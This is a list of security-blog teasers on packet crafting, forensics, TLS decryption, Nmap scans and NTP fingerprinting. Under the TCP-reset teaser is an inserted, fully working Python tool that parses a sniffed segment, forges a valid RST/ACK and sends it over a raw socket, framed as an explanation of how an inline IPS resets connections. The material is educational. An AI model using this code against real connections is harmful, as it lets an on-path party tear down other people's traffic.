- Solving the CTF challenge - Network Forensics (packet and log analysis), USB Disk Forensics, Database Forensics, Stego - Securitynik
At work, we develop and run various Cyber Security challenges to help the analysts (and the rest of the team) rapidly build and demonstrate their skill set. This challenge was put together by one of our managers, Jean. I thought this was an interesting challenge that covered a number of areas. As a result, I […]
- Packet Crafting - Tearing down a connection with TCP Reset - Securitynik
In a previous post, I crafted a TCP 3-way handshake to set up a connection with a remote device. In this post, we are going to sniff traffic between two devices and send a RST packet to tear down the connection. Think about what your IPS does as you go through this post. First up, the […]
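The excerpt above describes the mechanics without showing them. As an added illustration that is not code from the Securitynik post, the following pure-Python block (no scapy, so it runs anywhere) takes a sniffed IPv4/TCP segment from host A to host B and crafts the RST/ACK that B would appear to send back. The security-relevant detail is the sequence number: a modern stack following RFC 5961 only honours a RST whose SEQ equals exactly the next byte it expects, which is the ACK number A just sent, so the forged packet copies that value, swaps the addresses and ports, and recomputes both checksums. The hosts (10.0.0.5:51000 and 10.0.0.9:80), the sequence numbers and the captured GET request are all constructed sample data.

```python
import socket
import struct

FLAG_FIN, FLAG_SYN, FLAG_RST, FLAG_PSH, FLAG_ACK = 0x01, 0x02, 0x04, 0x08, 0x10


def checksum(data: bytes) -> int:
    """RFC 1071 Internet checksum: one's-complement sum of 16-bit words, odd tail zero-padded."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:  # fold carries back into the low 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4(src: str, dst: str, payload_len: int, proto: int = 6, ttl: int = 64) -> bytes:
    """Minimal 20-byte IPv4 header (DF set, no options) with header checksum filled in."""
    hdr = struct.pack("!BBHHHBBH4s4s", (4 << 4) | 5, 0, 20 + payload_len, 0, 0x4000,
                      ttl, proto, 0, socket.inet_aton(src), socket.inet_aton(dst))
    return hdr[:10] + struct.pack("!H", checksum(hdr)) + hdr[12:]


def build_tcp(src: str, dst: str, sport: int, dport: int, seq: int, ack: int,
              flags: int, window: int = 0, payload: bytes = b"") -> bytes:
    """20-byte TCP header (no options) plus payload; checksum covers the IPv4 pseudo-header."""
    hdr = struct.pack("!HHIIBBHHH", sport, dport, seq, ack, 5 << 4, flags, window, 0, 0)
    pseudo = (socket.inet_aton(src) + socket.inet_aton(dst)
              + struct.pack("!BBH", 0, 6, len(hdr) + len(payload)))
    csum = checksum(pseudo + hdr + payload)
    return hdr[:16] + struct.pack("!H", csum) + hdr[18:] + payload


def parse_tcp_segment(packet: bytes) -> dict:
    """Pull the 4-tuple, SEQ/ACK, flags and payload length out of an IPv4/TCP packet."""
    ihl = (packet[0] & 0x0F) * 4
    total_len = struct.unpack("!H", packet[2:4])[0]
    tcp = packet[ihl:total_len]
    sport, dport, seq, ack, off_flags = struct.unpack("!HHIIH", tcp[:14])
    data_off = (off_flags >> 12) * 4
    return dict(src=socket.inet_ntoa(packet[12:16]), dst=socket.inet_ntoa(packet[16:20]),
                sport=sport, dport=dport, seq=seq, ack=ack,
                flags=off_flags & 0xFF, payload_len=len(tcp) - data_off)


def tcp_checksum_ok(packet: bytes) -> bool:
    """Verify the TCP checksum the way the receiving stack does (sum incl. checksum field == 0)."""
    ihl = (packet[0] & 0x0F) * 4
    total_len = struct.unpack("!H", packet[2:4])[0]
    tcp = packet[ihl:total_len]
    pseudo = packet[12:16] + packet[16:20] + struct.pack("!BBH", 0, 6, len(tcp))
    return checksum(pseudo + tcp) == 0


def craft_rst_for(observed: bytes) -> bytes:
    """Given a sniffed segment A->B, forge the RST/ACK B would send to tear A's side down.

    SEQ of the RST = the ACK number A just sent (A's RCV.NXT), which is the only value a
    RFC 5961 compliant stack accepts without a challenge ACK. ACK of the RST = A's next SEQ.
    """
    s = parse_tcp_segment(observed)
    syn_fin = 1 if s["flags"] & (FLAG_SYN | FLAG_FIN) else 0  # SYN/FIN each consume one seq
    rst_seq = s["ack"]
    rst_ack = (s["seq"] + s["payload_len"] + syn_fin) & 0xFFFFFFFF
    tcp = build_tcp(s["dst"], s["src"], s["dport"], s["sport"], rst_seq, rst_ack, FLAG_RST | FLAG_ACK)
    return build_ipv4(s["dst"], s["src"], len(tcp)) + tcp


def send_raw(packet: bytes, dst: str) -> None:
    """Transmit a hand-built IPv4 packet; needs root (raw socket). Not called at import."""
    with socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) as sock:
        sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
        sock.sendto(packet, (dst, 0))


# Constructed sample capture: A (10.0.0.5:51000) -> B (10.0.0.9:80), PSH/ACK carrying a GET.
SAMPLE_REQUEST = b"GET / HTTP/1.0\r\n\r\n"
SAMPLE_TCP = build_tcp("10.0.0.5", "10.0.0.9", 51000, 80, seq=1000, ack=5000,
                       flags=FLAG_PSH | FLAG_ACK, window=65535, payload=SAMPLE_REQUEST)
SAMPLE_PACKET = build_ipv4("10.0.0.5", "10.0.0.9", len(SAMPLE_TCP)) + SAMPLE_TCP

if __name__ == "__main__":
    rst = craft_rst_for(SAMPLE_PACKET)
    print(parse_tcp_segment(rst), "checksum ok:", tcp_checksum_ok(rst))
```

Running the file prints the forged segment's fields: source 10.0.0.9:80, destination 10.0.0.5:51000, SEQ 5000, ACK 1018 (1000 plus the 18-byte request), flags 0x14 (RST|ACK), with a valid checksum. Only the host that sniffed the live SEQ/ACK can do this reliably, which is exactly why an inline IPS in "reset" mode succeeds where a blind off-path attacker has to guess a 32-bit sequence number.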
- Understanding and Decrypting TLS based communication - HTTP over TLS (HTTPS) - Securitynik
As a leader of multiple teams in a SOC at a Managed Security Services Provider (MSSP), I always find it interesting to see how new analysts may freeze when they hear the communication is encrypted. What many of these new analysts do not know is that, in some cases, you may be able to decrypt this communication. […]
- Understanding NMAP's scan techniques: -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans - Securitynik
A member of the Toronto Metropolitan University/Rogers Cybersecure Catalyst program, a program I’m currently a mentor for, was using Nmap and could not really see the difference when using the -sW and -sM scan techniques. To help that student and others using Nmap, I thought I should put together a quick blog post. Before getting into […]
- Its about time: OS Fingerprinting using NTP - Dr. J
Most current operating systems, including many small systems like IoT devices, use some form of NTP to sync time. NTP is lightweight and reasonably accurate in most use cases to synchronize time across the internet with millisecond accuracy [1]. Some protocols, like PTP, are more accurate but are designed for local networks and may require […]